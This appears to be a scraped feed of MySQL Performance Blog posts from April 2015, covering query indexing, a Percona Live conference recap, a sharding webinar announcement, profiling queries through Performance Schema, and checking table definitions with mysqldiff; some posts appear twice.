1. filter on d and sort by b.
2. filter on d and c.

Which strategy is more efficient? It will depend on your data, so you will have to experiment.

The second variation is:

SELECT * FROM t WHERE c > 100 ORDER BY b

This time we have no equality so we have to choose between filtering and sorting. Most likely you will choose filtering.

Conclusion

Not all cases have been covered in this post but you can already see that in some cases you will create poor MySQL indexes if you are not careful. In a future post, I will present a case that can look confusing at first sight but which is easy to understand if you already know everything mentioned here.

The post Indexing 101: Optimizing MySQL queries on a single table appeared first on MySQL Performance Blog.

Percona Live & OpenStack Live 2015 wrap-up

April 24, 2015 - 3:00am

Peter Zaitsev kicks off Percona Live 2015

With highlights that included news of Percona’s acquisition of Tokutek, a lively keynote discussion with Apple legend Steve “Woz” Wozniak, scores of technical sessions, tutorials and a festive MySQL community dinner and game night, last week’s Percona Live MySQL Conference and Expo had something for everyone.

More than 1,200 attendees from around the world converged upon Santa Clara, California for the event, which included for the first time a two-day OpenStack Live track alongside a two-day crash course for aspiring MySQL DBAs called “MySQL 101.”

With the Tokutek acquisition, announced last Tuesday by Peter Zaitsev, Percona becomes the first company to offer both MySQL and MongoDB software and solutions. Percona has also taken over development and support for TokuDB® and TokuMX™ as well as the revolutionary Fractal Tree® indexing technology that enables those products to deliver improved performance, reliability and compression for modern Big Data applications. Peter talks in depth about the technologies in last week’s post.

Apple legend Steve Wozniak at Percona Live

Also on Tuesday, “Woz” and Jim Doherty, EVP of Sales & Marketing, talked about a range of issues associated with technology and innovation.

The Apple co-founder and inventor of the Apple I and Apple II computers also shared his thoughts on what influenced him growing up, his approach to problem solving, childhood education, artificial intelligence and more. (You can view the entire 45-minute conversation by clicking on the Woz to the left.)

Tweets of #PerconaLive during the conference hit nearly 2,000 – many with photos that are worth looking at (see all of the tweets here).

The other keynotes included:

Community Appreciation Game Night

In addition to the above keynotes, all of the sessions were recorded and will be available soon for registered attendees who had access to them at the conference. Most of the slides will be available soon to everyone via the Percona Live 2015 site. Just click the session you’re interested in and scroll to the bottom of the page to view the slides.

Congratulations go out to all of the MySQL Community Awards 2015 winners with a special thanks to Shlomi Noach and Jeremy Cole for running the awards program.

Special thanks also goes out to the Percona Live and OpenStack Live 2015 conference committees, which together organized a fantastic week of events. And of course none of the events would have been possible without our generous Percona Live sponsors and OpenStack Live sponsors.

Finally, a round of applause for Percona’s director of conferences, Kortney Runyan, for her monumental efforts organizing the event. Kortney could not have succeeded without the support of our multiple service vendors including Ireland Presentations, Carleson Production Group, Tricord, the Hyatt Santa Clara, and the Santa Clara Convention Center, to name just a few.

Also announced last week was the new venue for Percona Live Europe, which will be held September 21-22 in Amsterdam. Percona Live Amsterdam promises to be bigger and better than ever. The Call for Papers is open for this exciting new venue so be sure to submit your proposals now.

See you in Amsterdam this September! And be sure to save the date for Percona Live 2016 – April 18-21 at the the Hyatt Santa Clara, and the Santa Clara Convention Center.

P.S. For more Percona Live and OpenStack Live 2015 photos…

The post Percona Live & OpenStack Live 2015 wrap-up appeared first on MySQL Performance Blog.

Percona Live & OpenStack Live 2015 wrap-up

April 24, 2015 - 3:00am

Peter Zaitsev kicks off Percona Live 2015

With highlights that included news of Percona’s acquisition of Tokutek, a lively keynote discussion with Apple legend Steve “Woz” Wozniak, scores of technical sessions, tutorials and a festive MySQL community dinner and game night, last week’s Percona Live MySQL Conference and Expo had something for everyone.

More than 1,200 attendees from around the world converged upon Santa Clara, California for the event, which included for the first time a two-day OpenStack Live track alongside a two-day crash course for aspiring MySQL DBAs called “MySQL 101.”

With the Tokutek acquisition, announced last Tuesday by Peter Zaitsev, Percona becomes the first company to offer both MySQL and MongoDB software and solutions. Percona has also taken over development and support for TokuDB® and TokuMX™ as well as the revolutionary Fractal Tree® indexing technology that enables those products to deliver improved performance, reliability and compression for modern Big Data applications. Peter talks in depth about the technologies in last week’s post.

Apple legend Steve Wozniak at Percona Live

Also on Tuesday, “Woz” and Jim Doherty, EVP of Sales & Marketing, talked about a range of issues associated with technology and innovation.

The Apple co-founder and inventor of the Apple I and Apple II computers also shared his thoughts on what influenced him growing up, his approach to problem solving, childhood education, artificial intelligence and more. (You can view the entire 45-minute conversation by clicking on the Woz to the left.)

Tweets of #PerconaLive during the conference hit nearly 2,000 – many with photos that are worth looking at (see all of the tweets here).

The other keynotes included:

Community Appreciation Game Night

In addition to the above keynotes, all of the sessions were recorded and will be available soon for registered attendees who had access to them at the conference. Most of the slides will be available soon to everyone via the Percona Live 2015 site. Just click the session you’re interested in and scroll to the bottom of the page to view the slides.

Congratulations go out to all of the MySQL Community Awards 2015 winners with a special thanks to Shlomi Noach and Jeremy Cole for running the awards program.

Special thanks also goes out to the Percona Live and OpenStack Live 2015 conference committees, which together organized a fantastic week of events. And of course none of the events would have been possible without our generous Percona Live sponsors and OpenStack Live sponsors.

Finally, a round of applause for Percona’s director of conferences, Kortney Runyan, for her monumental efforts organizing the event. Kortney could not have succeeded without the support of our multiple service vendors including Ireland Presentations, Carleson Production Group, Tricord, the Hyatt Santa Clara, and the Santa Clara Convention Center, to name just a few.

Also announced last week was the new venue for Percona Live Europe, which will be held September 21-22 in Amsterdam. Percona Live Amsterdam promises to be bigger and better than ever. The Call for Papers is open for this exciting new venue so be sure to submit your proposals now.

See you in Amsterdam this September! And be sure to save the date for Percona Live 2016 – April 18-21 at the the Hyatt Santa Clara, and the Santa Clara Convention Center.

P.S. For more Percona Live and OpenStack Live 2015 photos…

The post Percona Live & OpenStack Live 2015 wrap-up appeared first on MySQL Performance Blog.

Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome!

April 21, 2015 - 9:08am

MySQL sharding is one of the most used and surely the most abused MySQL scaling technology. My April 2 Dzone article, “To Shard, or Not to Shard,” proved there is indeed quite an interest in this topic.

As such, I’m hosting a live webinar tomorrow (April 22) that will shed light on questions about sharding with MySQL. It’s titled: To Shard or Not to Shard That is the Question!

I’ll be answering questions such as:

  • Is sharding right for your application or should you use other scaling technologies?
  • If you’re sharding, what things do you need to consider and which questions do you need to have answered?
  • What kind of specific technologies can assist you with sharding?

I hope you can make it for this April 22 webinar. It starts at 10 a.m. Pacific time. Please register now and bring your questions, as sharing them with me and the other attendees is half of the fun of live webinars.

Or if you prefer, share your questions about sharding with MySQL in the comments section below, and I’ll do my best to answer them. I’ll be writing a followup post that will include all questions and my answers soon. A recording of this webinar along with my slides will also be available here afterwards.

The post Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome! appeared first on MySQL Performance Blog.

Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome!

April 21, 2015 - 9:08am

MySQL sharding is one of the most used and surely the most abused MySQL scaling technology. My April 2 Dzone article, “To Shard, or Not to Shard,” proved there is indeed quite an interest in this topic.

As such, I’m hosting a live webinar tomorrow (April 22) that shed light on questions about sharding with MySQL. It’s titled: To Shard or Not to Shard That is the Question!

I’ll be answering question such as:

  • Is sharding right for your application or should you use other scaling technologies?
  • If you’re sharding, what things do you need to consider and which questions do you need to have answered?
  • What kind of specific technologies can assist you with sharding?

I hope you can make it for this April 22. Please register now and bring your questions, as sharing them with me and the other attendees is half of the fun of live webinars.

Or if you prefer, share your questions about sharding with MySQL in the comments section below, and I’ll do my best to answer them. I’ll be writing a followup post that will include all questions and my answers soon. A recording of this webinar along with my slides will also be available here afterwards.

The post Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome! appeared first on MySQL Performance Blog.

Profiling MySQL queries from Performance Schema

April 16, 2015 - 10:49am

When optimizing queries and investigating performance issues, MySQL comes with built in support for profiling queries akaSET profiling = 1; . This is already awesome and simple to use, but why the PERFORMANCE_SCHEMA alternative?

Because profiling will be removed soon (already deprecated on MySQL 5.6 ad 5.7); the built-in profiling capability can only be enabled per session. This means that you cannot capture profiling information for queries running from other connections. If you are using Percona Server, the profiling option for log_slow_verbosity is a nice alternative, unfortunately, not everyone is using Percona Server.

Now, for a quick demo: I execute a simple query and profile it below. Note that all of these commands are executed from a single session to my test instance.

mysql> SHOW PROFILES; +----------+------------+----------------------------------------+ | Query_ID | Duration   | Query                                  | +----------+------------+----------------------------------------+ |        1 | 0.00011150 | SELECT * FROM sysbench.sbtest1 LIMIT 1 | +----------+------------+----------------------------------------+ 1 row in set, 1 warning (0.00 sec) mysql> SHOW PROFILE SOURCE FOR QUERY 1; +----------------------+----------+-----------------------+------------------+-------------+ | Status               | Duration | Source_function       | Source_file      | Source_line | +----------------------+----------+-----------------------+------------------+-------------+ | starting             | 0.000017 | NULL                  | NULL             |        NULL | | checking permissions | 0.000003 | check_access          | sql_parse.cc     |        5797 | | Opening tables       | 0.000021 | open_tables           | sql_base.cc      |        5156 | | init                 | 0.000009 | mysql_prepare_select  | sql_select.cc    |        1050 | | System lock          | 0.000005 | mysql_lock_tables     | lock.cc          |         306 | | optimizing           | 0.000002 | optimize              | sql_optimizer.cc |         138 | | statistics           | 0.000006 | optimize              | sql_optimizer.cc |         381 | | preparing            | 0.000005 | optimize              | sql_optimizer.cc |         504 | | executing            | 0.000001 | exec                  | sql_executor.cc  |         110 | | Sending data         | 0.000025 | exec                  | sql_executor.cc  |         190 | | end                  | 0.000002 | mysql_execute_select  | sql_select.cc    |        1105 | | query end            | 0.000003 | mysql_execute_command | sql_parse.cc     |        5465 | | closing tables       | 0.000004 | mysql_execute_command | sql_parse.cc     |        5544 | | freeing items        | 0.000005 | mysql_parse           | sql_parse.cc     |        6969 | | cleaning up          | 0.000006 | dispatch_command      | sql_parse.cc     |        1874 | +----------------------+----------+-----------------------+------------------+-------------+ 15 rows in set, 1 warning (0.00 sec)

To demonstrate how we can achieve the same with Performance Schema, we first identify our current connection id. In the real world, you might want to get the connection/processlist id of the thread you want to watch i.e. fromSHOW PROCESSLIST .

mysql> SELECT THREAD_ID INTO @my_thread_id     -> FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID(); Query OK, 1 row affected (0.00 sec)

Next, we identify the bounding EVENT_IDs for the statement stages. We will look for the statement we wanted to profile using the query below from theevents_statements_history_longtable. Your LIMIT clause may vary depending on how much queries the server might be getting.

mysql> SELECT THREAD_ID, EVENT_ID, END_EVENT_ID, SQL_TEXT, NESTING_EVENT_ID     -> FROM events_statements_history_long     -> WHERE THREAD_ID = @my_thread_id     ->   AND EVENT_NAME = 'statement/sql/select'     -> ORDER BY EVENT_ID DESC LIMIT 3 G *************************** 1. row ***************************        THREAD_ID: 13848         EVENT_ID: 419     END_EVENT_ID: 434         SQL_TEXT: SELECT THREAD_ID INTO @my_thread_id FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID() NESTING_EVENT_ID: NULL *************************** 2. row ***************************        THREAD_ID: 13848         EVENT_ID: 374     END_EVENT_ID: 392         SQL_TEXT: SELECT * FROM sysbench.sbtest1 LIMIT 1 NESTING_EVENT_ID: NULL *************************** 3. row ***************************        THREAD_ID: 13848         EVENT_ID: 353     END_EVENT_ID: 364         SQL_TEXT: select @@version_comment limit 1 NESTING_EVENT_ID: NULL 3 rows in set (0.02 sec)

From the results above, we are mostly interested with the EVENT_ID and END_EVENT_ID values from the second row, this will give us the stage events of this particular query from theevents_stages_history_longtable.

mysql> SELECT EVENT_NAME, SOURCE, (TIMER_END-TIMER_START)/1000000000 as 'DURATION (ms)'     -> FROM events_stages_history_long     -> WHERE THREAD_ID = @my_thread_id AND EVENT_ID BETWEEN 374 AND 392; +--------------------------------+----------------------+---------------+ | EVENT_NAME                     | SOURCE               | DURATION (ms) | +--------------------------------+----------------------+---------------+ | stage/sql/init                 | mysqld.cc:998        |        0.0214 | | stage/sql/checking permissions | sql_parse.cc:5797    |        0.0023 | | stage/sql/Opening tables       | sql_base.cc:5156     |        0.0205 | | stage/sql/init                 | sql_select.cc:1050   |        0.0089 | | stage/sql/System lock          | lock.cc:306          |        0.0047 | | stage/sql/optimizing           | sql_optimizer.cc:138 |        0.0016 | | stage/sql/statistics           | sql_optimizer.cc:381 |        0.0058 | | stage/sql/preparing            | sql_optimizer.cc:504 |        0.0044 | | stage/sql/executing            | sql_executor.cc:110  |        0.0008 | | stage/sql/Sending data         | sql_executor.cc:190  |        0.0251 | | stage/sql/end                  | sql_select.cc:1105   |        0.0017 | | stage/sql/query end            | sql_parse.cc:5465    |        0.0031 | | stage/sql/closing tables       | sql_parse.cc:5544    |        0.0037 | | stage/sql/freeing items        | sql_parse.cc:6969    |        0.0056 | | stage/sql/cleaning up          | sql_parse.cc:1874    |        0.0006 | +--------------------------------+----------------------+---------------+ 15 rows in set (0.01 sec)

As you can see the results are pretty close, not exactly the same but close. SHOW PROFILE shows Duration in seconds, while the results above is in milliseconds.

Some limitations to this method though:

  • As we’ve seen it takes a few hoops to dish out the information we need. Because we have to identify the statement we have to profile manually, this procedure may not be easy to port into tools like the sys schema or pstop.
  • Only possible if Performance Schema is enabled (by default its enabled since MySQL 5.6.6, yay!)
  • Does not cover all metrics compared to the native profiling i.e. CONTEXT SWITCHES, BLOCK IO, SWAPS
  • Depending on how busy the server you are running the tests, the sizes of the history tables may be too small, as such you either have to increase or loose the history to early i.e.performance_schema_events_stages_history_long_sizevariable. Using ps_history might help in this case though with a little modification to the queries.
  • The resulting Duration per event may vary, I would think this may be due to the additional as described on performance_timers table. In any case we hope to get this cleared up as result when this bug is fixed.

The post Profiling MySQL queries from Performance Schema appeared first on MySQL Performance Blog.

Profiling MySQL queries from Performance Schema

April 16, 2015 - 10:49am

When optimizing queries and investigating performance issues, MySQL comes with built in support for profiling queries akaSET profiling = 1; . This is already awesome and simple to use, but why the PERFORMANCE_SCHEMA alternative?

Because profiling will be removed soon (already deprecated on MySQL 5.6 ad 5.7); the built-in profiling capability can only be enabled per session. This means that you cannot capture profiling information for queries running from other connections. If you are using Percona Server, the profiling option for log_slow_verbosity is a nice alternative, unfortunately, not everyone is using Percona Server.

Now, for a quick demo: I execute a simple query and profile it below. Note that all of these commands are executed from a single session to my test instance.

mysql> SHOW PROFILES; +----------+------------+----------------------------------------+ | Query_ID | Duration   | Query                                  | +----------+------------+----------------------------------------+ |        1 | 0.00011150 | SELECT * FROM sysbench.sbtest1 LIMIT 1 | +----------+------------+----------------------------------------+ 1 row in set, 1 warning (0.00 sec) mysql> SHOW PROFILE SOURCE FOR QUERY 1; +----------------------+----------+-----------------------+------------------+-------------+ | Status               | Duration | Source_function       | Source_file      | Source_line | +----------------------+----------+-----------------------+------------------+-------------+ | starting             | 0.000017 | NULL                  | NULL             |        NULL | | checking permissions | 0.000003 | check_access          | sql_parse.cc     |        5797 | | Opening tables       | 0.000021 | open_tables           | sql_base.cc      |        5156 | | init                 | 0.000009 | mysql_prepare_select  | sql_select.cc    |        1050 | | System lock          | 0.000005 | mysql_lock_tables     | lock.cc          |         306 | | optimizing           | 0.000002 | optimize              | sql_optimizer.cc |         138 | | statistics           | 0.000006 | optimize              | sql_optimizer.cc |         381 | | preparing            | 0.000005 | optimize              | sql_optimizer.cc |         504 | | executing            | 0.000001 | exec                  | sql_executor.cc  |         110 | | Sending data         | 0.000025 | exec                  | sql_executor.cc  |         190 | | end                  | 0.000002 | mysql_execute_select  | sql_select.cc    |        1105 | | query end            | 0.000003 | mysql_execute_command | sql_parse.cc     |        5465 | | closing tables       | 0.000004 | mysql_execute_command | sql_parse.cc     |        5544 | | freeing items        | 0.000005 | mysql_parse           | sql_parse.cc     |        6969 | | cleaning up          | 0.000006 | dispatch_command      | sql_parse.cc     |        1874 | +----------------------+----------+-----------------------+------------------+-------------+ 15 rows in set, 1 warning (0.00 sec)

To demonstrate how we can achieve the same with Performance Schema, we first identify our current connection id. In the real world, you might want to get the connection/processlist id of the thread you want to watch i.e. fromSHOW PROCESSLIST .

mysql> SELECT THREAD_ID INTO @my_thread_id     -> FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID(); Query OK, 1 row affected (0.00 sec)

Next, we identify the bounding EVENT_IDs for the statement stages. We will look for the statement we wanted to profile using the query below from theevents_statements_history_longtable. Your LIMIT clause may vary depending on how much queries the server might be getting.

mysql> SELECT THREAD_ID, EVENT_ID, END_EVENT_ID, SQL_TEXT, NESTING_EVENT_ID     -> FROM events_statements_history_long     -> WHERE THREAD_ID = @my_thread_id     ->   AND EVENT_NAME = 'statement/sql/select'     -> ORDER BY EVENT_ID DESC LIMIT 3 G *************************** 1. row ***************************        THREAD_ID: 13848         EVENT_ID: 419     END_EVENT_ID: 434         SQL_TEXT: SELECT THREAD_ID INTO @my_thread_id FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID() NESTING_EVENT_ID: NULL *************************** 2. row ***************************        THREAD_ID: 13848         EVENT_ID: 374     END_EVENT_ID: 392         SQL_TEXT: SELECT * FROM sysbench.sbtest1 LIMIT 1 NESTING_EVENT_ID: NULL *************************** 3. row ***************************        THREAD_ID: 13848         EVENT_ID: 353     END_EVENT_ID: 364         SQL_TEXT: select @@version_comment limit 1 NESTING_EVENT_ID: NULL 3 rows in set (0.02 sec)

From the results above, we are mostly interested with the EVENT_ID and END_EVENT_ID values from the second row, this will give us the stage events of this particular query from theevents_stages_history_longtable.

mysql> SELECT EVENT_NAME, SOURCE, (TIMER_END-TIMER_START)/1000000000 as 'DURATION (ms)'     -> FROM events_stages_history_long     -> WHERE THREAD_ID = @my_thread_id AND EVENT_ID BETWEEN 374 AND 392; +--------------------------------+----------------------+---------------+ | EVENT_NAME                     | SOURCE               | DURATION (ms) | +--------------------------------+----------------------+---------------+ | stage/sql/init                 | mysqld.cc:998        |        0.0214 | | stage/sql/checking permissions | sql_parse.cc:5797    |        0.0023 | | stage/sql/Opening tables       | sql_base.cc:5156     |        0.0205 | | stage/sql/init                 | sql_select.cc:1050   |        0.0089 | | stage/sql/System lock          | lock.cc:306          |        0.0047 | | stage/sql/optimizing           | sql_optimizer.cc:138 |        0.0016 | | stage/sql/statistics           | sql_optimizer.cc:381 |        0.0058 | | stage/sql/preparing            | sql_optimizer.cc:504 |        0.0044 | | stage/sql/executing            | sql_executor.cc:110  |        0.0008 | | stage/sql/Sending data         | sql_executor.cc:190  |        0.0251 | | stage/sql/end                  | sql_select.cc:1105   |        0.0017 | | stage/sql/query end            | sql_parse.cc:5465    |        0.0031 | | stage/sql/closing tables       | sql_parse.cc:5544    |        0.0037 | | stage/sql/freeing items        | sql_parse.cc:6969    |        0.0056 | | stage/sql/cleaning up          | sql_parse.cc:1874    |        0.0006 | +--------------------------------+----------------------+---------------+ 15 rows in set (0.01 sec)

As you can see the results are pretty close, not exactly the same but close. SHOW PROFILE shows Duration in seconds, while the results above is in milliseconds.

Some limitations to this method though:

  • As we’ve seen it takes a few hoops to dish out the information we need. Because we have to identify the statement we have to profile manually, this procedure may not be easy to port into tools like the sys schema or pstop.
  • Only possible if Performance Schema is enabled (by default its enabled since MySQL 5.6.6, yay!)
  • Does not cover all metrics compared to the native profiling i.e. CONTEXT SWITCHES, BLOCK IO, SWAPS
  • Depending on how busy the server you are running the tests, the sizes of the history tables may be too small, as such you either have to increase or loose the history to early i.e.performance_schema_events_stages_history_long_sizevariable. Using ps_history might help in this case though with a little modification to the queries.
  • The resulting Duration per event may vary, I would think this may be due to the additional as described on performance_timers table. In any case we hope to get this cleared up as result when this bug is fixed.

The post Profiling MySQL queries from Performance Schema appeared first on MySQL Performance Blog.

Checking table definition consistency with mysqldiff

April 15, 2015 - 1:45pm

Data inconsistencies in replication environments are a pretty common. There are lots of posts that explain how to fix those using pt-table-checksum and pt-table-sync. Usually we only care about the data but from time to time we receive this question in support:

How can I check the table definition consistency between servers?

Replication also allow us to have different table definition between master and slaves. For example, there are some cases that you need some indexes on slaves for querying purposes but are not really needed on the master. There are some other cases where those differences are just a mistake that needs to be fixed.

mysqldiff, included in Oracle’s MySQL Utilities, can help us to find those differences and get the information we need to fix those them. In this post I’m going to show you how to use it with an example.

Find table definition inconsistencies

mysqldiff allows us to find those inconsistencies checking the differences between the tables on the same server (different databases) or on different servers (also possible on different databases). In this example I’m going to search for differences in table definitions between two different servers, server1 and server2.

The command line is pretty simple. This is used to compare the tables on “test” database:

mysqldiff --server1=user@host1 --server2=user@host2 test:test

If the database name is different:

mysqldiff --server1=user@host1 --server2=user@host2 testdb:anotherdb

If the table name is different:

mysqldiff --server1=user@host1 --server2=user@host2 testdb.table1:anotherdb.anothertable

Now I want to check the table definition consistency between two servers. The database’s name is “employees”:

# mysqldiff --force --server1=root:msandbox@127.0.0.1:21489 --server2=root:msandbox@127.0.0.1:21490 employees:employees # WARNING: Using a password on the command line interface can be insecure. # server1 on 127.0.0.1: ... connected. # server2 on 127.0.0.1: ... connected. # Comparing `employees` to `employees` [PASS] # Comparing `employees`.`departments` to `employees`.`departments` [FAIL] # Object definitions differ. (--changes-for=server1) # --- `employees`.`departments` +++ `employees`.`departments` @@ -1,6 +1,6 @@ CREATE TABLE `departments` ( `dept_no` char(4) NOT NULL, - `dept_name` varchar(40) NOT NULL, + `dept_name` varchar(256) DEFAULT NULL, PRIMARY KEY (`dept_no`), UNIQUE KEY `dept_name` (`dept_name`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 # Comparing `employees`.`dept_emp` to `employees`.`dept_emp` [PASS] # Comparing `employees`.`dept_manager` to `employees`.`dept_manager` [PASS] # Comparing `employees`.`employees` to `employees`.`employees` [FAIL] # Object definitions differ. (--changes-for=server1) # --- `employees`.`employees` +++ `employees`.`employees` @@ -5,5 +5,6 @@ `last_name` varchar(16) NOT NULL, `gender` enum('M','F') NOT NULL, `hire_date` date NOT NULL, - PRIMARY KEY (`emp_no`) + PRIMARY KEY (`emp_no`), + KEY `last_name` (`last_name`,`first_name`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 # Comparing `employees`.`salaries` to `employees`.`salaries` [PASS] # Comparing `employees`.`titles` to `employees`.`titles` [PASS] Compare failed. One or more differences found.

There are at least two differences. One in departments table and another one in employees table. The output is similar to diff. By default the tool stops after finding the first difference. That’s why we use –force, to tell the tool to continue checking all the tables.

It shows us that on departments the dept_name is varchar(40) on server1 and varchar(256) on server2. For “employees” table, it has a KEY (last_name, first_name) on the server2 that is not present on server1. Why is it taking server2 as a reference? Because of this line:

# Object definitions differ. (--changes-for=server1)

So, the changes shown on the diff are for server1. If you want server2 to be the one to be changed and server1 used as reference, then –changes-for=server2 would be needed.

In some cases the diff output is not really useful. We actually need a SQL query to do the changes on the server. We just need to add –difftype=sql to the command line:

# mysqldiff --force --difftype=sql --server1=root:msandbox@127.0.0.1:21489 --server2=root:msandbox@127.0.0.1:21490 employees:employees [...] # Comparing `employees`.`departments` to `employees`.`departments` [FAIL] # Transformation for --changes-for=server1: ALTER TABLE `employees`.`departments` DROP INDEX dept_name, ADD UNIQUE INDEX dept_name (dept_name), CHANGE COLUMN dept_name dept_name varchar(256) NULL; [...] # Comparing `employees`.`employees` to `employees`.`employees` [FAIL] # Transformation for --changes-for=server1: # ALTER TABLE `employees`.`employees` DROP PRIMARY KEY, ADD PRIMARY KEY(`emp_no`), ADD INDEX last_name (last_name,first_name);

As we can see, the tool is not perfect. There are two problems here:

1- On “departments table” it drops a UNIQUE key that is present in both servers only to add it again. Waste of time and resources.

2- On “employees” table it drops and recreate the PRIMARY KEY, again something that is not needed a all.

I have created a bug report but this also teaches us a good lesson. Don’t just copy and paste commands without first double checking it.

What mysqldiff runs under the hood?

Mostly queries on INFORMATION_SCHEMA. These are the ones used to check inconsistencies on departments:

SHOW CREATE TABLE `departments`; SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE, AUTO_INCREMENT, AVG_ROW_LENGTH, CHECKSUM, TABLE_COLLATION, TABLE_COMMENT, ROW_FORMAT, CREATE_OPTIONS FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments'; SELECT ORDINAL_POSITION, COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_COMMENT, COLUMN_KEY FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments'; SELECT PARTITION_NAME, SUBPARTITION_NAME, PARTITION_ORDINAL_POSITION, SUBPARTITION_ORDINAL_POSITION, PARTITION_METHOD, SUBPARTITION_METHOD, PARTITION_EXPRESSION, SUBPARTITION_EXPRESSION, PARTITION_DESCRIPTION FROM INFORMATION_SCHEMA.PARTITIONS WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments'; SELECT CONSTRAINT_NAME, COLUMN_NAME, REFERENCED_TABLE_SCHEMA, REFERENCED_TABLE_NAME, REFERENCED_COLUMN_NAME FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments' AND REFERENCED_TABLE_SCHEMA IS NOT NULL; SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE, AUTO_INCREMENT, AVG_ROW_LENGTH, CHECKSUM, TABLE_COLLATION, TABLE_COMMENT, ROW_FORMAT, CREATE_OPTIONS FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments'; SELECT ORDINAL_POSITION, COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_COMMENT, COLUMN_KEY FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments'; SELECT PARTITION_NAME, SUBPARTITION_NAME, PARTITION_ORDINAL_POSITION, SUBPARTITION_ORDINAL_POSITION, PARTITION_METHOD, SUBPARTITION_METHOD, PARTITION_EXPRESSION, SUBPARTITION_EXPRESSION, PARTITION_DESCRIPTION FROM INFORMATION_SCHEMA.PARTITIONS WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'departments';

As a summary, it checks partitions, row format, collation, constraints and so on.

Conclusion

There are different tools for different purposes. We can check the data consistency with pt-table-checkum/pt-table-sync but also the table definitions with mysqldiff.

The post Checking table definition consistency with mysqldiff appeared first on MySQL Performance Blog.

Pages

]]>